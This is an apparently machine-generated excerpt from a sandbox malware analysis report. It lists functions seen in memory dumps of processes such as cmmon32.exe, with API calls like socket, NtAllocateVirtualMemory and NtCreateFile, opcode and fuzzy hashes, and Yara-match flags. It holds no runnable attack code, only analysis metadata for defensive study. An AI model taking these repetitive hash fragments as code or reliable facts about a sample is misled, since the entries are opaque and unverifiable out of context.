                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C2DEF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID: sock
                                                                                                                • API String ID: 98920635-2415254727
                                                                                                                • Opcode ID: 492921c7a6c651628f697892ead3c4d1433c0312c824eedce86bc82d59284046
                                                                                                                • Instruction ID: ff86cf9437f3bcc7cfe4706e3dc743980c3e60753d824113d32b94acb6ed4c68
                                                                                                                • Opcode Fuzzy Hash: 492921c7a6c651628f697892ead3c4d1433c0312c824eedce86bc82d59284046
                                                                                                                • Instruction Fuzzy Hash: B90184706186088FCB84EF5CD448B54BBE0FB59314F1545ADD45DDB336C7B0C9818B86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C2DF2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID: sock
                                                                                                                • API String ID: 98920635-2415254727
                                                                                                                • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                • Instruction ID: d719a1b27a409168d289a4735bfc0668a7425b10337121fb24b73666dc436d02
                                                                                                                • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                • Instruction Fuzzy Hash: AD0121706186188FCB84EF5CD048B54BBE0FB59314F1545ADD45DDB266C7B0C9818B86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061BB2C9, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 89e68823b88dd7943186ea2ef901c253fc527279e89cfd0e2dd32652b3228245
                                                                                                                • Instruction ID: ba2f0f765878bf7e6c1e6d6bb8bf927d0f9056c02862af5fd6ec78a1104e5e37
                                                                                                                • Opcode Fuzzy Hash: 89e68823b88dd7943186ea2ef901c253fc527279e89cfd0e2dd32652b3228245
                                                                                                                • Instruction Fuzzy Hash: 22314B74A08B49DFDBA4EF6980882E9B7A1FB94300F54527EC92DCA612CB349554CFD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C305A, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2781271927-0
                                                                                                                • Opcode ID: e96d3ad00266d852a7a19c2bf0630f6ffdc445d47fc8afbda49bf0d0bcd512aa
                                                                                                                • Instruction ID: 64fdb4a2ba2bcf1864feb02be424d9de4c9ffbd203d1a1c66819abb89398ff31
                                                                                                                • Opcode Fuzzy Hash: e96d3ad00266d852a7a19c2bf0630f6ffdc445d47fc8afbda49bf0d0bcd512aa
                                                                                                                • Instruction Fuzzy Hash: 50D05E3420C7484FEF84EF68A05A7AD77E1FBD8312F09096DD85FCB246CB6646818756
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Analysis Process: cmmon32.exe PID: 6856 Parent PID: 3388 cmmon32.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 02B29F40, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02B24B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B24B97,007A002E,00000000,00000060,00000000,00000000), ref: 02B29F8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction ID: 08d342a3b1ca3939b4a7b158f9fd02793c1181e9adca319ad52dae980bd0c32d
                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction Fuzzy Hash: 02F0B2B2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B29FF0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(02B24D52,5EB6522D,FFFFFFFF,02B24A11,?,?,02B24D52,?,02B24A11,FFFFFFFF,5EB6522D,02B24D52,?,00000000), ref: 02B2A035
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction ID: 5e79bbaa7baa1ae55245b366ab83a2f2d7a247c4011d49bef2b26426a065609d
                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction Fuzzy Hash: 3DF0B7B2200208AFCB14DF89DC94EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A11A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B12D11,00002000,00003000,00000004), ref: 02B2A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: d4db3ab8b9fb2eca9c067398f90bc36ec5ddf20bffa69048124fdb0b8337412c
                                                                                                                • Instruction ID: 73d66b5c61baecf33933aae77c65d4a521ec94842219c030ab10de35dfc6ba38
                                                                                                                • Opcode Fuzzy Hash: d4db3ab8b9fb2eca9c067398f90bc36ec5ddf20bffa69048124fdb0b8337412c
                                                                                                                • Instruction Fuzzy Hash: E0F0A0B5110189AFDB14DF98DC84CE7B7ADFF88214B14869DF94D97202C234D855CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A120, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B12D11,00002000,00003000,00000004), ref: 02B2A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction ID: 5d9b1cb463a907057681d03aa50ed74a1a5489cce0381cdf7a7c0001bdd8aa52
                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction Fuzzy Hash: 59F015B2200218ABCB14DF89CC90EAB77ADAF88750F118148BE0897241C630F810CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A070, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02B24D30,?,?,02B24D30,00000000,FFFFFFFF), ref: 02B2A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction ID: 0291b3d16fcceefc04b952d302483b302e231f74b0d0730c2b6014dee2d1e65e
                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction Fuzzy Hash: 69D01776200314ABD710EB98CC89FA7BBADEF48760F154499BA1C9B242C530FA008AE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A06C, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02B24D30,?,?,02B24D30,00000000,FFFFFFFF), ref: 02B2A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: ffd8d53e8eb56800d75bc2eea86395ddc74a38793fb87e0d628d595c1ac996ad
                                                                                                                • Instruction ID: 2a1b391eab93e7f7d74add3ca92beca5f4be91a9712a83740cb399fcdf875220
                                                                                                                • Opcode Fuzzy Hash: ffd8d53e8eb56800d75bc2eea86395ddc74a38793fb87e0d628d595c1ac996ad
                                                                                                                • Instruction Fuzzy Hash: DAE0EC75200214ABD710EB98CC89E97776DEB48750F154599BA189B282C534F9008BD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2fbb3bea804fda819ef2aa364b8e2a2ff9d63bd8d83fc8cbb1cda8fc1a9a4137
                                                                                                                • Instruction ID: 405f19e941f930404b71fdcc5d629eb717772dcdb1f66c308ebfd30cfccc3382
                                                                                                                • Opcode Fuzzy Hash: 2fbb3bea804fda819ef2aa364b8e2a2ff9d63bd8d83fc8cbb1cda8fc1a9a4137
                                                                                                                • Instruction Fuzzy Hash: D99002A124205017610571595414616441B97E4245B51C421E50055A1DC665E8D17165
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 68fb2e4cb9e40a87ad62206e3ef17b975030ef9a3860dada47e33e18c7d69e84
                                                                                                                • Instruction ID: 55b2402c184f998469f4bda34df891ec1ada622acae5d29b113640dd68afe946
                                                                                                                • Opcode Fuzzy Hash: 68fb2e4cb9e40a87ad62206e3ef17b975030ef9a3860dada47e33e18c7d69e84
                                                                                                                • Instruction Fuzzy Hash: 4D900265251050172105A5591704507045797D9395351C421F5006561CD761E8A16161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09560, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ef93f0c5e9760093171daa5ff44f8f256d83f231480bfae451d4252e2be98c9a
                                                                                                                • Instruction ID: 34e5bd24762cc6f90a3ca98033f68d350df082aec2c2523950b5a8f0322830a1
                                                                                                                • Opcode Fuzzy Hash: ef93f0c5e9760093171daa5ff44f8f256d83f231480bfae451d4252e2be98c9a
                                                                                                                • Instruction Fuzzy Hash: 85900265261050162145A559160450B0857A7DA395391C415F54075A1CC761E8A56361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 48d1e8a3197b9d385169c7e6d80d72a84b4f683d41096e85855bd43e75e28c3d
                                                                                                                • Instruction ID: 02ce622ed678f043135fa90fb61ce6b617dbaccb50af310b39a5add43b17c199
                                                                                                                • Opcode Fuzzy Hash: 48d1e8a3197b9d385169c7e6d80d72a84b4f683d41096e85855bd43e75e28c3d
                                                                                                                • Instruction Fuzzy Hash: 3890027124105856F10061595404B46041797E4345F51C416A4115665D8755E8917561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8db6a7c0b398928b81c0e661224e9b833cef9c32eb994c4883943d0908216b9e
                                                                                                                • Instruction ID: ce25676b32b694ba4948ede982b0b28d39060686f1beebd55dad3683f3db0db5
                                                                                                                • Opcode Fuzzy Hash: 8db6a7c0b398928b81c0e661224e9b833cef9c32eb994c4883943d0908216b9e
                                                                                                                • Instruction Fuzzy Hash: 6D9002712410D816F1106159940474A041797D4345F55C811A8415669D87D5E8D17161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 5288bf830fd12f6ef89059d714d140cc61f39dddb7930ee7fb568b6425008896
                                                                                                                • Instruction ID: b268867d5105a1070f4d9caded42a8e5692e62eedd428d281c139369ae037186
                                                                                                                • Opcode Fuzzy Hash: 5288bf830fd12f6ef89059d714d140cc61f39dddb7930ee7fb568b6425008896
                                                                                                                • Instruction Fuzzy Hash: 4390027124509856F14071595404A46042797D4349F51C411A40556A5D9765ED95B6A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 6f619f3de74b19572b944d1b62b4d455b7a5b231579b3943704cdea65fa96a79
                                                                                                                • Instruction ID: bc109d6b0721da764e9562dc8d53feb01d66c99ff69a0988a0926593e7eba1fc
                                                                                                                • Opcode Fuzzy Hash: 6f619f3de74b19572b944d1b62b4d455b7a5b231579b3943704cdea65fa96a79
                                                                                                                • Instruction Fuzzy Hash: 3A90027124105816F1807159540464A041797D5345F91C415A4016665DCB55EA9977E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09610, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 96b79ee0214db3862e039051103b14835eb545b9664333be35c122d5aef2b05e
                                                                                                                • Instruction ID: 304861bd0e72a0361825abf350c0476bf4181ae47066cd1737f99995cea82e18
                                                                                                                • Opcode Fuzzy Hash: 96b79ee0214db3862e039051103b14835eb545b9664333be35c122d5aef2b05e
                                                                                                                • Instruction Fuzzy Hash: EE90027164505816F15071595414746041797D4345F51C411A4015665D8795EA9576E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f35c3e420e28bf5a54856fd8abe9e62158b72b8f91f078e791d800f0fac14082
                                                                                                                • Instruction ID: 4d0563b75c3fc0c1ff3e89ab0c284f0210b6dff9389d0f9939bfb3a605a3d3aa
                                                                                                                • Opcode Fuzzy Hash: f35c3e420e28bf5a54856fd8abe9e62158b72b8f91f078e791d800f0fac14082
                                                                                                                • Instruction Fuzzy Hash: 5490027135119416F11061599404706041797D5245F51C811A4815569D87D5E8D17162
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9289bd9eecea13b8c46764efbd3217d6f52316426da779ed887344923ba1079e
                                                                                                                • Instruction ID: 0a81d570b088a6a04dc77e72707fe381237af922e05e2391524b1f961ce80baf
                                                                                                                • Opcode Fuzzy Hash: 9289bd9eecea13b8c46764efbd3217d6f52316426da779ed887344923ba1079e
                                                                                                                • Instruction Fuzzy Hash: 0390026925305016F1807159640860A041797D5246F91D815A4006569CCA55E8A96361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09770, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 92fe7f8dad7096eee347568025aa0a7ec9a47f94e8dddcf4aea6a363ac948bd5
                                                                                                                • Instruction ID: eb236ca900efa9c3c7cf79d20c3f508dfdeda6e806669e8bcc04f1b256419b00
                                                                                                                • Opcode Fuzzy Hash: 92fe7f8dad7096eee347568025aa0a7ec9a47f94e8dddcf4aea6a363ac948bd5
                                                                                                                • Instruction Fuzzy Hash: AD90026124509456F10065596408A06041797D4249F51D411A50555A6DC775E891B171
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: bea6ccd1f2e7d29659839b8e6dba39b6f75e3b024e5558b5308ce64982e8c1f7
                                                                                                                • Instruction ID: de67a4c72cdad578c5cdf735127c63ad966cfe4e69f7721e21fbef4cc0dc6461
                                                                                                                • Opcode Fuzzy Hash: bea6ccd1f2e7d29659839b8e6dba39b6f75e3b024e5558b5308ce64982e8c1f7
                                                                                                                • Instruction Fuzzy Hash: E490027124105416F10065996408646041797E4345F51D411A9015566EC7A5E8D17171
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a05847c121950ae56bafd6d2bd10af4a7e3693cad79cffd76bf3d6c4ff777014
                                                                                                                • Instruction ID: 998edee5ea9dd7da059c1b86200cc34a52f91e9b4ebec412fb129d980b9f3395
                                                                                                                • Opcode Fuzzy Hash: a05847c121950ae56bafd6d2bd10af4a7e3693cad79cffd76bf3d6c4ff777014
                                                                                                                • Instruction Fuzzy Hash: BC900261282091667545B15954045074417A7E4285791C412A5405961C8666F896E661
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a70d399e50da5cc0a0be36867f7fd8b7844cf2f77f8323b935c2f8d9d8a393b4
                                                                                                                • Instruction ID: 221ee43b764e3e6cb159f9b3b2af86854b1a5cd3a373d7b24f695afa7e063811
                                                                                                                • Opcode Fuzzy Hash: a70d399e50da5cc0a0be36867f7fd8b7844cf2f77f8323b935c2f8d9d8a393b4
                                                                                                                • Instruction Fuzzy Hash: 5190027124105427F11161595504707041B97D4285F91C812A4415569D9796E992B161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: d2fc54fa83ef2a31911a788de9cc81b2d54c4a451e6fd2ab768163218944d56c
                                                                                                                • Instruction ID: a27f1cbe57af33b026c7361e9de05afcdd47efe5b62fb88b5f27c3aefd219303
                                                                                                                • Opcode Fuzzy Hash: d2fc54fa83ef2a31911a788de9cc81b2d54c4a451e6fd2ab768163218944d56c
                                                                                                                • Instruction Fuzzy Hash: 8E9002A138105456F10061595414B060417D7E5345F51C415E5055565D8759EC927166
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
